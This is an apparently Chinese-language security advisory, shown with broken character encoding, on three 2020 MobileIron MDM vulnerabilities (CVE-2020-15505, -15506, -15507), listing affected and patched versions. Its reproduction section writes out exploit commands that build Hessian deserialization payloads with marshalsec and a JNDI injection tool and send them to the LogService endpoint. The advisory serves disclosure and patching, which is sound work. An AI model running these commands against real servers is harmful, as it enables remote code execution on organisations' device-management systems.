MobileIron | 11ÔÂMDM¶à¸ö°²È«·ì϶¹«¸æ

°ä²¼¹¦·ò 2020-11-26

0x00 ·ì϶¸ÅÊö

²úÆ·Ãû³Æ

CVE ID

Àà ÐÍ

·ì϶µÈ¼¶

Ô¶³ÌÀûÓÃ

MobileIron Core &   Connector¡¢Sentry¡¢Monitor and Reporting Database   (RDB)

CVE-2020-15505

RCE

ÑϳÁ

ÊÇ

MobileIron Core£¦Connector

CVE-2020-15506

Éí·ÝÑéÖ¤ÈÆ¹ý

ÑϳÁ

ÊÇ

MobileIron Core

CVE-2020-15507

ËÁÒâÎļþ¶ÁÈ¡

¸ßΣ

ÊÇ

 

0x01 ·ì϶ÏêÇé

 

image.png

 

MobileIronÊÇÈ«Çòµ±ÏÈÇÒ·¢Õ¹×îѸ¿ìµÄÒÆ¶¯IT½â¾ö¹æ»®³§ÉÌÖ®Ò»£¬ÔÚÈ«ÇòÓнü20000¼Ò¹«Ë¾Ê¹ÓÃMobileIronµÄÒÆ¶¯É豸ÖÎÀí½â¾ö¹æ»®£¨MDM£©¡£

2020Äê10ÔÂ22ÈÕ£¬MobileIron°ä²¼¸üв¼¸æ£¬MDMÖдæÔڵĶà¸ö°²È«·ì϶£¨CVE-2020-15505¡¢CVE-2020-15506ºÍCVE-2020-15507£©ÒÑÔÚ6ÔÂ15ÈÕ°ä²¼µÄ²¹¶¡Öб»½¨¸´¡£·ì϶ÏêÇéÈçÏ£º 

MobileIronÔ¶³Ì´úÂëÖ´Ðзì϶£¨CVE-2020-15505£©

¸Ã·ì϶ÊÇMobileIronÒÆ¶¯É豸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öÔ¶³Ì´úÂëÖ´Ðзì϶£¬ÆäCVSSÆÀ·Ö9.8¡£¹¥»÷ÕßÄܹ»ÀûÓô˷ì϶ִÐÐËÁÒâ´úÂë²¢½ÚÔ칫˾µÄ·þÎñÆ÷¡£

¸Ã·ì϶µÄPoCÒÑÓÚ9ÔÂÔÚGithubÉϱ»°ä²¼¡£½üÈÕ£¬¸Ã·ì϶ÔÚ±»APT×éÖ¯ºÍÍøÂç·¸×ï×éÖ¯»ý¼«³¢ÊÔÀûÓá£

 

·ì϶¸´ÏÖ£º

Groovy·´ÐòÁл¯Ó×¹¤¾ß

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "" > exp.ser

python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser

image.png

 

±¾µØJNDI×¢Èë

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C ""

java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://:1099/> exp

python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

image.png

image.png

 

Ó°ÏìÁìÓò£º

MobileIron Core£¦Connector£º10.3.0.3¼°Ö®Ç°°æ±¾¡¢10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3¡¢10.5.1.0¡¢10.5.2.0¡¢10.6.0.0

Sentry£º9.7.2¼°Ö®Ç°°æ±¾¡¢9.8.0

Monitor and Reporting Database (RDB)£º2.0.0.1¼°Ö®Ç°°æ±¾

 

 

MobileIronÉí·ÝÑéÖ¤ÈÆ¹ý·ì϶£¨CVE-2020-15506£©

¸Ã·ì϶ÊÇMobileIronÒÆ¶¯É豸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öÉí·ÝÑéÖ¤ÈÆ¹ý·ì϶£¬ÆäCVSSÆÀ·Ö9.8¡£¹¥»÷Õß¿ÉÀûÓô˷ìÏ¶ÈÆ¹ýÉí·ÝÑéÖ¤»úÔì¡£

Ó°ÏìÁìÓò£º

MobileIron Core£¦Connector£º

10.3.0.3¼°Ö®Ç°°æ±¾

10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3

10.5.1.0¡¢10.5.2.0

10.6.0.0

 

 

MobileIronËÁÒâÎļþ¶ÁÈ¡·ì϶£¨CVE-2020-15507£©

¸Ã·ì϶ÊÇMobileIronÒÆ¶¯É豸ÖÎÀí£¨MDM£©ÖеÄÒ»¸öËÁÒâÎļþ¶ÁÈ¡·ì϶£¬ÆäCVSSÆÀ·Ö7.5¡£¹¥»÷Õß¿ÉÀûÓô˷ì϶¶ÁÈ¡ÎļþϵͳÖеÄÃô¸ÐÐÅÏ¢¡£

Ó°ÏìÁìÓò£º

MobileIron Core£º

10.3.0.3¼°Ö®Ç°°æ±¾

10.4.0.0¡¢10.4.0.1¡¢10.4.0.2¡¢10.4.0.3

10.5.1.0¡¢10.5.2.0

10.6.0.0

 

 

0x02 ´ëÖý¨Òé

ĿǰMobileIronÒѾ­°ä²¼ÁËÓйظüУ¬½¨Òé²ÎÉý¼¶ÖÁÈçϰ汾¡£

MobileIron Core & Enterprise Connector£º

v10.3.0.4¡¢v10.4.0.4¡¢v10.5.1.1¡¢v10.5.2.1¡¢v10.6.0.»ò¸ü¸ß°æ±¾¡£

MobileIron Sentry£º

v9.7.3¡¢v9.8.1»ò¸ü¸ß°æ±¾¡£

MobileIron Monitor and Reporting Database (RDB)£º

v2.0.0.2»ò¸ü¸ß°æ±¾¡£

 

²¹¶¡Á´½Ó£º

https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA

 

0x03 ²Î¿¼Á´½Ó

https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

 

0x04 ¹¦·òÏß

2020-07-01  MobileIron°ä²¼°²È«²¼¸æ

2020-10-22  MobileIron¸üа²È«²¼¸æ

2020-11-26  VSRC°ä²¼°²È«¹«¸æ

 

0x05 ¸½Â¼

 

CVSSÆÀ·Ö³ß¶È¹ÙÍø£ºhttp://www.first.org/cvss/

image.png